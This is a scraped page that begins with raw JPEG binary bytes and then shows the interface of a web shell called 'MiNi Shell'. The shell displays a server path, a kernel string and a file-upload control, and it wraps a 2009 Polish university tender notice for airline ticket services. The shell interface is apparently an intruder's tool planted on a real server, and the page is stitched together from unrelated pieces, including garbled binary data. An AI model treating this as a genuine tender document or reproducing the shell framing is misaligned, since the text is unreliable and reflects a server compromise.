JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090106/4679-N-2009.html

<p class="kh_header"><b>Łódź: Świadczenie usług w zakresie rezerwacji i sprzedaży biletów lotniczych dla Politechniki Łódzkiej (DWZ)</b><br>
<b>Numer ogłoszenia: 4679 - 2009; data zamieszczenia: 06.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Łódzka - Dział Współpracy z Zagranicą , ul. Skorupki 6/8, 90-924 Łódź, woj. łódzkie, tel. 0-42 6312081, faks 0-42 6365014.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.p.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie rezerwacji i sprzedaży biletów lotniczych dla Politechniki Łódzkiej (DWZ).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje:
1. Kompleksową obsługę w zakresie rezerwacji biletów lotniczych międzynarodowych oraz bezkolizyjną realizację połączeń wieloetapowych zagranicznych,
2. Realizowanie  usług przez  Wykonawcę, po zawiadomieniu przez Zamawiającego telefonicznie, e-mailem, komunikatorem gadu-gadu lub  faxem z możliwie  długim  wyprzedzeniem, nie  krótszym jednak niż 10  dni o zamówieniu danego  biletu lotniczego.
3. Możliwość realizowania usług przez  Wykonawcę w nagłych przypadkach, wówczas  termin zawiadomienia Wykonawcy  nie  może  być  krótszy niż  12 godzin  o zamówieniu  danego  biletu.
4. Zorganizowanie i zabezpieczenie kompleksowej realizacji przedmiotu zamówienia zgodnie z obowiązującymi przepisami lokalnymi i krajów docelowych  (dot. wszelkiego rodzaju opłat np. lotniskowych, podatków itp.).
5. Dokonywanie optymalnego wyboru przewoźnika oraz trasy przelotu pod względem ceny i czasu  trwania podróży. Najdłuższy czas oczekiwania na lotnisku w przelocie   pośrednim nie może wynosić dłużej niż 4 godziny.
6. Zastosowanie najtańszych taryf przewoźnika: zamawiane bilety mają być najtańszymi dostępnymi biletami lotniczymi według taryf  IATA,  taryf specjalnych, taryf poufnych i promocyjnych, chyba, że Zamawiający zgłosi w tym zakresie inne wymogi.
7.  Przedstawianie Zamawiającemu wariantów połączeń związanych z jedną podróżą - o ile jest to możliwe ze względów techniczno-organizacyjnych  co najmniej trzech, łącznie z cenami poszczególnych wariantów.
8. Wystawianie  biletów (drukowanie) przez Wykonawcę,  po akceptacji dokonanej w formie elektronicznej lub telefonicznie, przez upoważnionego przedstawiciela Zamawiającego z Działu Współpracy z Zagranicą. 
9. Rezerwację, sprzedaż oraz przekazywanie biletów lotniczych do siedziby  Zamawiającego lub pod wskazany adres (do 30 km od centrum Łodzi w  przypadku braku możliwości przesłania mailem) w ciągu maksymalnie 6 godzin od wystawienia biletu.
10. Możliwość dokonania zmiany, przepisania  nazwiska  pracownika Zamawiającego na bilecie oraz ewentualnej rezygnacji  z zaplanowanego przelotu zgodnie z zasadami określonymi w regulaminie przewoźnika, którego to dotyczy. Zmiana taka będzie realizowana z pominięciem opłaty transakcyjnej.
11. Kontrolowanie spełniania  warunków przewoźnika  (w zakresie np. terminów  dokonywania wykupu biletów).  
12. Zapewnienie możliwości odbioru biletu poza granicami RP.
13. Zamawiający dokona zapłaty Wykonawcy należności w kwocie skalkulowanej na podstawie najtańszych taryf IATA, taryf specjalnych, poufnych lub promocyjnych w dniu wystawienia biletu, za wykonanie usług określonych w pkt. 2.1. SIWZ  na podstawie otrzymanej faktury VAT,  odpowiednio do  terminu wskazanego przez  Wykonawcę wyłonionego w niniejszym  postępowaniu.    
14.  Możliwość zwrotu biletów niewykorzystanych zgodnie z regulaminem i taryfami przewoźnika, tj. w przypadku  zwrotu 100% kosztów  biletu przez  przewoźnika, zwrot  100%  kosztów  Zamawiającemu. Wykonawca  jest  zobowiązany  przy  przykazywaniu biletów Zmawiającemu, okazać  dokument  informujący  o sposobie  rozliczania  niewykorzystanych  biletów przez przewoźnika.       
15. Umieszczanie na fakturze następujących informacji: części składowe ceny biletu,  dane pasażera oraz dane dotyczące podróży..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 63.51.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca przystępujący do niniejszego postępowania  jest zobowiązany do wniesienia wadium w wysokości 20.000,00 PLN (dwadzieścia tysięcy PLN).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zamawiający dokona zgodnie z art. 22 ust. 1 ustawy Pzp wyboru spośród Wykonawców którzy:
1.1. posiadają uprawnienia do wykonywania  określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2.  posiadają    niezbędną     wiedzę   i   doświadczenie   oraz   dysponują   potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, zgodnie z art. 24 ust. 1 i 2 ustawy Pzp.
1.A Zamawiający dokona wyboru spośród Wykonawców, którzy potwierdzą, że oferowane usługi odpowiadają  wymaganiom określonym przez Zamawiającego.
2 Sposób dokonania oceny spełnienia warunków.     
Ocena spełnienia wymaganych warunków zostanie dokonana metodą spełnia - nie spełnia w oparciu o dokumenty wyszczególnione w pkt. 2.1., 2.2. , 2.3. i  2.4.
2.1 Spełnienie warunku wymienionego w pkt. 1.1. i 1.4. zostanie uznane, jeżeli Wykonawca przedstawi:
- Podpisane Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania, na podstawie art. 24 ust. 1 i 2 ustawy Pzp. (Zał. nr  2b do SIWZ),  
- Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż  6 miesięcy przed  upływem terminu  składania   ofert,   (Zał. nr 3 do SIWZ),  
 - Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego (Zał. nr 4 do SIWZ)  oraz aktualne  zaświadczenie  właściwego  oddziału  ZUS  lub  KRUS  (Zał. nr 5 do SIWZ) potwierdzających odpowiednio, że  Wykonawca nie zalega z opłacaniem podatków, opłat  oraz  składek na ubezpieczenie  zdrowotne i społeczne  lub zaświadczeń, że uzyskał  przewidziane prawem  zwolnienie, odroczenie  lub  rozłożenie na  raty zaległych  płatności lub wstrzymanie w  całości  wykonania  decyzji właściwego organu - wystawionych  nie wcześniej  niż  3  miesiące przed upływem terminu  składania  ofert  (Zał. 4 i 5 do SIWZ),
- Aktualną  informację  z  Krajowego Rejestru  Karnego w zakresie określonym w  
art. 24 ust. 1 pkt 4) -  pkt 8) ustawy Pzp,  wystawioną nie wcześniej  niż  6 miesięcy  przed upływem terminu składania ofert  (Zał. nr 6a do SIWZ),   i-lub
- Aktualną  informację z Krajowego Rejestru  Karnego w zakresie określonym w 
art. 24 ust. 1 pkt  9) ustawy Pzp,  wystawioną  nie  wcześniej  niż  6 miesięcy przed upływem terminu składania ofert (Zał. nr 6b do SIWZ),
2.2. Spełnienie warunku wymienionego w pkt. 1.2. zostanie uznane jeżeli Wykonawca przedłoży :
- Podpisane Oświadczenie Wykonawcy o spełnieniu warunków (Zał. nr 2a do SIWZ),  
- Wykaz wykonanych usług w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców i potwierdzeniem, że usługi te zostały wykonane należycie  (Zał. nr 7 do SIWZ). 
Wykonawcy są zobowiązani udokumentować wykonanie usług w ciągu ostatnich 3 lat
 (od 1.01.2006r. do 31.12.2008r.) tj: jednej umowy na usługę rezerwacji i sprzedaży biletów lotniczych o wartości  750.000,00 PLN (siedemset pięćdziesiąt tysięcy) brutto  lub min. 4 umów,  gdzie  wartość  każdej  umowy wynosi min. 200.000,00 PLN (dwieście  tysięcy PLN) brutto.   
- Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia (Zał. nr 8 do SIWZ).  Zamawiający oczekuje, aby Wykonawca w Wykazie wskazał,  co najmniej jedną kasjerkę lotniczą, która  posiada ukończony co najmniej  jeden kurs taryfowy  IATA  oraz  Zamawiający oczekuje, aby Wykonawca w Wykazie wskazał, że min. trzy kasjerki, posiadają ukończony co najmniej jeden kurs rezerwacyjny. 
Ponadto Zamawiający oczekuje, aby co najmniej jedna kasjerka posiadała co najmniej trzyletni  staż pracy na stanowisku kasjerki lotniczej,  a dwie kasjerki posiadały  co najmniej roczny staż  pracy na stanowisku kasjerki lotniczej 
lub  
- Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeśli w  Wykazie stanowiącym Załącznik nr 8 do SIWZ, Wykonawca wskazał osoby, którymi będzie dysponował. 
2.3. Spełnienie warunku wymienionego w pkt. 1.3.  zostanie uznane jeżeli Wykonawca przedłoży:
-  Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony  od  odpowiedzialności cywilnej w zakresie prowadzonej działalności      gospodarczej na kwotę nie mniejszą niż  180.000 PLN,  (Zał. nr 9 do SIWZ).
2.4. Spełnienie warunku wymienionego w pkt. 4.1.A  zostanie uznane, jeżeli Wykonawca  przedłoży :
- Certyfikat członkostwa Międzynarodowego Stowarzyszenia Transportu Lotniczego  IATA  (Zał. nr 10 do SIWZ)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> -  Oświadczenie  Wykonawcy spełniającego  warunki o udzielenie  zamówienia na  podstawie  art. 22 ust. 1  ustawy Pzp,  
- Oświadczenie Wykonawcy o niepodleganiu wykluczeniu  z  postępowania na podstawie  art. 24 ust. 1 i 2  ustawy Pzp, 
- Aktualny  odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy  wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie  wcześniej  niż  6 miesięcy  przed  upływem  terminu składania ofert, 
- Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału ZUS  lub KRUS, potwierdzających odpowiednio, że Wykonawca  nie  zalega z  opłacaniem podatków, opłat oraz  składek na ubezpieczenie zdrowotne i społeczne  lub zaświadczeń, że uzyskał   przewidziane prawem  zwolnienie,  odroczenie  lub  rozłożenie na raty zaległych płatności  lub wstrzymanie w  całości  wykonania  decyzji właściwego  organu - wystawionych   nie wcześniej   niż 3  miesiące przed upływem terminu  składania  ofert.
- Aktualna  informacja  z  Krajowego Rejestru  Karnego w zakresie określonym w  
art. 24 ust. 1 pkt 4) -  pkt 8) ustawy Pzp,  wystawiona nie wcześniej  niż  6 miesięcy  przed upływem terminu składania ofert i-lub
-Aktualna  informacja z Krajowego Rejestru  Karnego w zakresie określonym w  
art. 24 ust. 1 pkt  9) ustawy Pzp,  wystawiona  nie  wcześniej  niż  6 miesięcy przed upływem terminu składania ofert 
- Wykaz wykonanych usług w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. 
Wykonawcy są zobowiązani udokumentować wykonanie usług w ciągu ostatnich 3 lat (od 1.01.2006r. do 31.12. 2008r.), tj. jednej umowy na usługę rezerwacji i sprzedaży biletów lotniczych o wartości min.  750.000,00 PLN  (siedemset pięćdziesiąt tysięcy) brutto  lub min. 4 umów,  gdzie  wartość  każdej umowy wynosi min. 200.000,00 PLN 
(dwieście  tysięcy PLN) brutto.   
- Wykaz  osób, którymi dysponuje lub będzie dysponował Wykonawca i  które  będą uczestniczyć w  wykonywaniu  zamówienia wraz  z  informacjami na temat ich  kwalifikacji zawodowych, doświadczenia  i wykształcenia  niezbędnych do wykonania zamówienia  a  także zakresu wykonywanych przez  nie  czynności. Zamawiający oczekuje, aby Wykonawca w Wykazie wskazał,  co najmniej jedną kasjerkę lotniczą, która  posiada ukończony co najmniej  jeden kurs taryfowy  IATA oraz  Zamawiający oczekuje, aby Wykonawca w Wykazie wskazał, że min. trzy kasjerki, posiadają ukończony co najmniej jeden kurs rezerwacyjny. 
Zamawiający oczekuje, aby co najmniej jedna kasjerka posiadała co najmniej trzyletni  staż pracy na stanowisku kasjerki lotniczej,  a dwie kasjerki posiadały  co najmniej roczny staż  pracy na stanowisku kasjerki lotniczej  
lub
Wykonawca przedłoży Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeśli w  Wykazie stanowiącym Załącznik nr 8 do SIWZ, Wykonawca wskazał osoby, którymi będzie dysponował. 
- Polisa a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony  od  odpowiedzialności cywilnej w zakresie prowadzonej działalności      gospodarczej na kwotę nie mniejszą niż  180.000 PLN.
- Certyfikat członkostwa Międzynarodowego Stowarzyszenia Transportu Lotniczego IATA.  
Wszystkie ww. dokumenty powinny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem, przez osobę uprawnioną do składania oświadczeń woli w imieniu Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 65</li>
<li>2 - Proponowane przez wykonawcę usługi dodatkowe - 30</li>
<li>3 - Termin płatności - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zp.p.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POLITECHNIKA ŁÓDZKA 
DZIAŁ WSPÓŁPRACYZ ZAGRANICĄ
90-924 Łódź, ul. Ks. Skorupki 6/8,  
- odpłatnie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2009 godzina 14:00, miejsce: Oferty należy składać w sekretariacie Prorektora ds. Nauki Politechniki Łódzkiej (pokój 109), Łódź, ul. Ks. I. Skorupki 6/8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com